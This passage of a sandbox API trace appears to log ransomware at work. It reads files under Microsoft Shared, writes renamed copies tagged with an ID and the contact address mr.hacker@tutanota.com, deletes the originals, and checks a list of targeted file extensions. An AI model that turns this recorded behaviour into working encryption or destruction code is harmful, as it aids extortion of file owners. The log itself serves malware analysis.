Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.232] GetLastError () returned 0x0 [0054.232] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x2b0b7, lpOverlapped=0x0) returned 1 [0054.236] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x2b0c0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x2b0c0, lpOverlapped=0x0) returned 1 [0054.239] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.239] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.239] SetEndOfFile (hFile=0x174) returned 1 [0054.239] CloseHandle (hObject=0x174) returned 1 [0054.239] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.239] SetEndOfFile (hFile=0x218) returned 1 [0054.241] CloseHandle (hObject=0x218) returned 1 [0054.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.241] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 1 [0054.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.242] lstrlenW (lpString=".doc") returned 4 [0054.242] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0054.242] lstrlenW (lpString=".docx") returned 5 [0054.242] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0054.242] lstrlenW (lpString=".pdf") returned 4 [0054.242] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0054.242] lstrlenW (lpString=".xls") returned 4 [0054.242] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0054.242] lstrlenW (lpString=".xlsx") returned 5 [0054.242] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0054.242] lstrlenW (lpString=".ppt") returned 4 [0054.242] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0054.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.242] lstrlenW (lpString=".zip") returned 4 [0054.242] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0054.242] lstrlenW (lpString=".rar") returned 4 [0054.242] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0054.242] lstrlenW (lpString=".bz2") returned 4 [0054.242] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0054.242] lstrlenW (lpString=".7z") returned 3 [0054.242] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0054.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.242] lstrlenW (lpString=".dbf") returned 4 [0054.242] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0054.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.242] lstrlenW (lpString=".1cd") returned 4 [0054.242] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0054.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.242] lstrlenW (lpString=".jpg") returned 4 [0054.242] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0054.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.243] lstrlenW (lpString=".doc") returned 4 [0054.243] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0054.243] lstrlenW (lpString=".docx") returned 5 [0054.243] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0054.243] lstrlenW (lpString=".pdf") returned 4 [0054.243] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0054.243] lstrlenW (lpString=".xls") returned 4 [0054.243] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0054.243] lstrlenW (lpString=".xlsx") returned 5 [0054.243] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0054.243] lstrlenW (lpString=".ppt") returned 4 [0054.243] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0054.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.243] lstrlenW (lpString=".zip") returned 4 [0054.243] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0054.243] lstrlenW (lpString=".rar") returned 4 [0054.243] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0054.243] lstrlenW (lpString=".bz2") returned 4 [0054.243] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0054.243] lstrlenW (lpString=".7z") returned 3 [0054.243] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0054.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.243] lstrlenW (lpString=".dbf") returned 4 [0054.243] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0054.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.243] lstrlenW (lpString=".1cd") returned 4 [0054.243] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0054.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0054.243] lstrlenW (lpString=".jpg") returned 4 [0054.243] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0054.244] lstrcmpiW (lpString1=".TTF", lpString2=".USA") returned -1 [0054.244] lstrlenW (lpString="MTEXTRA.TTF") returned 11 [0054.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.244] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=7656) returned 1 [0054.244] CloseHandle (hObject=0x218) returned 1 [0054.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 0x20 [0054.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.244] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.244] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.245] GetLastError () returned 0x0 [0054.245] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x1de8, lpOverlapped=0x0) returned 1 [0054.246] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x1df0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x1df0, lpOverlapped=0x0) returned 1 [0054.247] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.247] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.247] SetEndOfFile (hFile=0x174) returned 1 [0054.247] CloseHandle (hObject=0x174) returned 1 [0054.247] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.248] SetEndOfFile (hFile=0x218) returned 1 [0054.248] CloseHandle (hObject=0x218) returned 1 [0054.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.248] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 1 [0054.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.249] lstrlenW (lpString=".doc") returned 4 [0054.249] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0054.249] lstrlenW (lpString=".docx") returned 5 [0054.249] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0054.249] lstrlenW (lpString=".pdf") returned 4 [0054.249] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0054.249] lstrlenW (lpString=".xls") returned 4 [0054.249] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0054.249] lstrlenW (lpString=".xlsx") returned 5 [0054.249] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0054.249] lstrlenW (lpString=".ppt") returned 4 [0054.249] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0054.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.249] lstrlenW (lpString=".zip") returned 4 [0054.249] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0054.249] lstrlenW (lpString=".rar") returned 4 [0054.249] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0054.249] lstrlenW (lpString=".bz2") returned 4 [0054.249] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0054.249] lstrlenW (lpString=".7z") returned 3 [0054.249] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0054.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.249] lstrlenW (lpString=".dbf") returned 4 [0054.249] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0054.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.249] lstrlenW (lpString=".1cd") returned 4 [0054.249] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0054.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.249] lstrlenW (lpString=".jpg") returned 4 [0054.249] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0054.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.250] lstrlenW (lpString=".doc") returned 4 [0054.250] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0054.250] lstrlenW (lpString=".docx") returned 5 [0054.250] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0054.250] lstrlenW (lpString=".pdf") returned 4 [0054.250] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0054.250] lstrlenW (lpString=".xls") returned 4 [0054.250] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0054.250] lstrlenW (lpString=".xlsx") returned 5 [0054.250] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0054.250] lstrlenW (lpString=".ppt") returned 4 [0054.250] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0054.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.250] lstrlenW (lpString=".zip") returned 4 [0054.250] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0054.250] lstrlenW (lpString=".rar") returned 4 [0054.250] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0054.250] lstrlenW (lpString=".bz2") returned 4 [0054.250] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0054.250] lstrlenW (lpString=".7z") returned 3 [0054.250] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0054.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.250] lstrlenW (lpString=".dbf") returned 4 [0054.250] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0054.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.250] lstrlenW (lpString=".1cd") returned 4 [0054.250] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0054.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0054.250] lstrlenW (lpString=".jpg") returned 4 [0054.250] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0054.251] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0054.251] lstrlenW (lpString="MSOEURO.DLL") returned 11 [0054.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.251] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=31104) returned 1 [0054.251] CloseHandle (hObject=0x218) returned 1 [0054.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 0x20 [0054.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.253] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.253] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.253] GetLastError () returned 0x0 [0054.253] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x7980, lpOverlapped=0x0) returned 1 [0054.256] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x7990, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x7990, lpOverlapped=0x0) returned 1 [0054.257] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.257] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.257] SetEndOfFile (hFile=0x174) returned 1 [0054.257] CloseHandle (hObject=0x174) returned 1 [0054.258] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.258] SetEndOfFile (hFile=0x218) returned 1 [0054.258] CloseHandle (hObject=0x218) returned 1 [0054.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.259] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 1 [0054.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.259] lstrlenW (lpString=".doc") returned 4 [0054.259] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.259] lstrlenW (lpString=".docx") returned 5 [0054.259] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0054.259] lstrlenW (lpString=".pdf") returned 4 [0054.259] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.259] lstrlenW (lpString=".xls") returned 4 [0054.259] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.259] lstrlenW (lpString=".xlsx") returned 5 [0054.259] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0054.259] lstrlenW (lpString=".ppt") returned 4 [0054.259] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.259] lstrlenW (lpString=".zip") returned 4 [0054.259] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.259] lstrlenW (lpString=".rar") returned 4 [0054.259] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.259] lstrlenW (lpString=".bz2") returned 4 [0054.259] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.259] lstrlenW (lpString=".7z") returned 3 [0054.259] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.259] lstrlenW (lpString=".dbf") returned 4 [0054.259] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.260] lstrlenW (lpString=".1cd") returned 4 [0054.260] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.260] lstrlenW (lpString=".jpg") returned 4 [0054.260] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.260] lstrlenW (lpString=".doc") returned 4 [0054.260] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.260] lstrlenW (lpString=".docx") returned 5 [0054.260] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0054.260] lstrlenW (lpString=".pdf") returned 4 [0054.260] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.260] lstrlenW (lpString=".xls") returned 4 [0054.260] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.260] lstrlenW (lpString=".xlsx") returned 5 [0054.260] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0054.260] lstrlenW (lpString=".ppt") returned 4 [0054.260] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.260] lstrlenW (lpString=".zip") returned 4 [0054.260] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.260] lstrlenW (lpString=".rar") returned 4 [0054.260] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.260] lstrlenW (lpString=".bz2") returned 4 [0054.260] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.260] lstrlenW (lpString=".7z") returned 3 [0054.260] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.260] lstrlenW (lpString=".dbf") returned 4 [0054.260] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.260] lstrlenW (lpString=".1cd") returned 4 [0054.260] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0054.261] lstrlenW (lpString=".jpg") returned 4 [0054.261] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.261] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0054.261] lstrlenW (lpString="msgfilt.dll") returned 11 [0054.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.262] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=38768) returned 1 [0054.262] CloseHandle (hObject=0x218) returned 1 [0054.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 0x20 [0054.262] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.262] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.262] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.264] GetLastError () returned 0x0 [0054.264] ReadFile (in: hFile=0x218, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x9770, lpOverlapped=0x0) returned 1 [0054.266] WriteFile (in: hFile=0x174, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x9780, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, 